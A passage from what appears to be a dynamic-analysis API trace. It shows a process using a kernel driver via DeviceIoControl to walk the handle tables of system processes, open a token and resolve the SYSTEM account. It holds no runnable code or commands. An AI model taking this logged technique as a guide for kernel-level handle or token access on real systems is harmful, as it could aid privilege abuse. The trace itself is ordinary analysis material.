Size=0x808) returned 0x1dc05e0 [0201.040] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0201.040] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.040] PsAcquireProcessExitSynchronization () returned 0x0 [0201.040] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.040] ObReferenceObjectByHandle (in: Handle=0xffffffff800007a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003ada250, HandleInformation=0x0) returned 0x0 [0201.040] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.040] PsReleaseProcessExitSynchronization () returned 0x2 [0201.040] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.040] ObQueryNameString (in: Object=0xfffffa8003ada250, ObjectNameInfo=0xfffffa800315a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800315a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.040] ObfDereferenceObject (Object=0xfffffa8003ada250) returned 0x2 [0201.040] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.040] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.040] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.040] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0201.040] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.040] PsAcquireProcessExitSynchronization () returned 0x0 [0201.040] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.040] ObReferenceObjectByHandle (in: Handle=0xffffffff800007a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800280f350, HandleInformation=0x0) returned 0x0 [0201.040] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.040] PsReleaseProcessExitSynchronization () returned 0x2 [0201.041] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.041] ObQueryNameString (in: Object=0xfffffa800280f350, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.041] ObfDereferenceObject (Object=0xfffffa800280f350) returned 0x2 [0201.041] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.041] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.041] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.041] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0201.041] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.041] PsAcquireProcessExitSynchronization () returned 0x0 [0201.041] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.041] ObReferenceObjectByHandle (in: Handle=0xffffffff800007b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800288d9b0, HandleInformation=0x0) returned 0x0 [0201.041] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.041] PsReleaseProcessExitSynchronization () returned 0x2 [0201.041] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.041] ObQueryNameString (in: Object=0xfffffa800288d9b0, ObjectNameInfo=0xfffffa800315d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800315d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.041] ObfDereferenceObject (Object=0xfffffa800288d9b0) returned 0x2 [0201.041] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.041] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.041] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.041] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0201.041] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.041] PsAcquireProcessExitSynchronization () returned 0x0 [0201.041] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.041] ObReferenceObjectByHandle (in: Handle=0xffffffff800007bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002ee7f20, HandleInformation=0x0) returned 0x0 [0201.041] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.041] PsReleaseProcessExitSynchronization () returned 0x2 [0201.042] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.042] ObQueryNameString (in: Object=0xfffffa8002ee7f20, ObjectNameInfo=0xfffffa800315e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800315e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.042] ObfDereferenceObject (Object=0xfffffa8002ee7f20) returned 0x11 [0201.042] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.042] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.042] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.042] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0201.042] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.042] PsAcquireProcessExitSynchronization () returned 0x0 [0201.042] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.042] ObReferenceObjectByHandle (in: Handle=0xffffffff800007c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a281f0, HandleInformation=0x0) returned 0x0 [0201.042] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.042] PsReleaseProcessExitSynchronization () returned 0x2 [0201.042] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.042] ObQueryNameString (in: Object=0xfffffa8003a281f0, ObjectNameInfo=0xfffffa8003160044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003160044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.042] ObfDereferenceObject (Object=0xfffffa8003a281f0) returned 0x2 [0201.042] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.042] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.042] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.042] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xf8, lpOverlapped=0x0) returned 1 [0201.042] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.042] PsAcquireProcessExitSynchronization () returned 0x0 [0201.043] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.043] ObReferenceObjectByHandle (in: Handle=0xffffffff800007c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002839800, HandleInformation=0x0) returned 0x0 [0201.043] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.043] PsReleaseProcessExitSynchronization () returned 0x2 [0201.043] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.043] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003161044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003161044, ReturnLength=0xfffff880052b3508) returned 0x0 [0201.043] ObfDereferenceObject (Object=0xfffffa8002839800) returned 0x1 [0201.043] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.043] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.043] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.043] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1dc05e0, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0201.043] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.043] PsAcquireProcessExitSynchronization () returned 0x0 [0201.043] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.043] ObReferenceObjectByHandle (in: Handle=0xffffffff800007dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0x0, HandleInformation=0x0) returned 0xc0000008 [0201.043] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.043] PsReleaseProcessExitSynchronization () returned 0x2 [0201.043] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.043] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.043] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.043] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.043] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xf8, lpOverlapped=0x0) returned 1 [0201.044] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.044] PsAcquireProcessExitSynchronization () returned 0x0 [0201.044] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.044] ObReferenceObjectByHandle (in: Handle=0xffffffff80000814, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80029f2f20, HandleInformation=0x0) returned 0x0 [0201.044] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.044] PsReleaseProcessExitSynchronization () returned 0x2 [0201.044] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.044] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003163044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003163044, ReturnLength=0xfffff880052b3508) returned 0x0 [0201.044] ObfDereferenceObject (Object=0xfffffa80029f2f20) returned 0x3 [0201.044] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.044] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0xc8 [0201.044] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0201.044] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8007ff84f0, HandleInformation=0x0) returned 0x0 [0201.044] ObOpenObjectByPointer (in: Object=0xfffffa8007ff84f0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000884) returned 0x0 [0201.044] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x18 [0201.044] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000884, DesiredAccess=0x8, TokenHandle=0xfffffa80030a9240 | out: TokenHandle=0xfffffa80030a9240*=0xc4) returned 0x0 [0201.044] ZwClose (Handle=0xffffffff80000884) returned 0x0 [0201.044] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.044] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0201.044] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0201.067] CloseHandle (hObject=0xc4) returned 1 [0201.067] CloseHandle (hObject=0xc8) returned 1 [0201.067] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.067] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0201.067] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.067] PsAcquireProcessExitSynchronization () returned 0x0 [0201.067] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0) [0217.429] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002eb5d80, HandleInformation=0x0) returned 0x0 [0217.429] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0217.429] PsReleaseProcessExitSynchronization () returned 0x2 [0217.429] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0217.429] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0217.429] ObfDereferenceObject (Object=0xfffffa8002eb5d80) returned 0x1 [0217.429] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0217.430] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0217.431] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0217.431] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0217.431] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0217.431] PsAcquireProcessExitSynchronization () returned 0x0 [0217.431] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0) [0217.458] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002cd9880, HandleInformation=0x0) returned 0x0 [0217.458] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0217.458] PsReleaseProcessExitSynchronization () returned 0x2 [0217.458] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0217.458] ObQueryNameString (in: Object=0xfffffa8002cd9880, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0217.458] ObfDereferenceObject (Object=0xfffffa8002cd9880) returned 0x1 [0217.458] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0217.458] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0217.458] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0217.459] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0217.459] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0217.459] PsAcquireProcessExitSynchronization () returned 0x0 [0217.459] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0) [0217.564] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002eb5ae0, HandleInformation=0x0) returned 0x0 [0217.564] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0217.564] PsReleaseProcessExitSynchronization () returned 0x2 [0217.564] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0217.565] ObQueryNameString (in: Object=0xfffffa8002eb5ae0, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0217.565] ObfDereferenceObject (Object=0xfffffa8002eb5ae0) returned 0x1 [0217.565] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0217.565] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0217.565] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0217.565] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0217.565] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0217.565] PsAcquireProcessExitSynchronization () returned 0x0 [0217.565] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0) [0217.634] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002eb5990, HandleInformation=0x0) returned 0x0 [0217.634] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0217.634] PsReleaseProcessExitSynchronization () returned 0x2 [0217.634] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0217.634] ObQueryNameString (in: Object=0xfffffa8002eb5990, ObjectNameInfo=0xfffffa8003150044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003150044, ReturnLength=0xfffff880052b3550) returned 0x0 [0217.634] ObfDereferenceObject (Object=0xfffffa8002eb5990) returned 0x1 [0217.634] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0217.634] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0217.634] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0217.634] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0217.634] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0217.634] PsAcquireProcessExitSynchronization () returned 0x0 [0217.634] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0) [0217.716] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002eb5840, HandleInformation=0x0) returned 0x0 [0217.716] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0217.720] PsReleaseProcessExitSynchronization () returned 0x2 [0217.720] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0218.258] ObQueryNameString (in: Object=0xfffffa8002eb5840, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0218.258] ObfDereferenceObject (Object=0xfffffa8002eb5840) returned 0x1 [0218.258] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0218.258] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0218.258] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0218.258] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0218.258] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0218.258] PsAcquireProcessExitSynchronization () returned 0x0 [0218.258] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0) [0218.620] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002eb56f0, HandleInformation=0x0) returned 0x0 [0218.620] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0218.620] PsReleaseProcessExitSynchronization () returned 0x2 [0218.620] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0218.620] ObQueryNameString (in: Object=0xfffffa8002eb56f0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0218.620] ObfDereferenceObject (Object=0xfffffa8002eb56f0) returned 0x1 [0218.620] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0218.620] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0218.620] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0218.620] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, 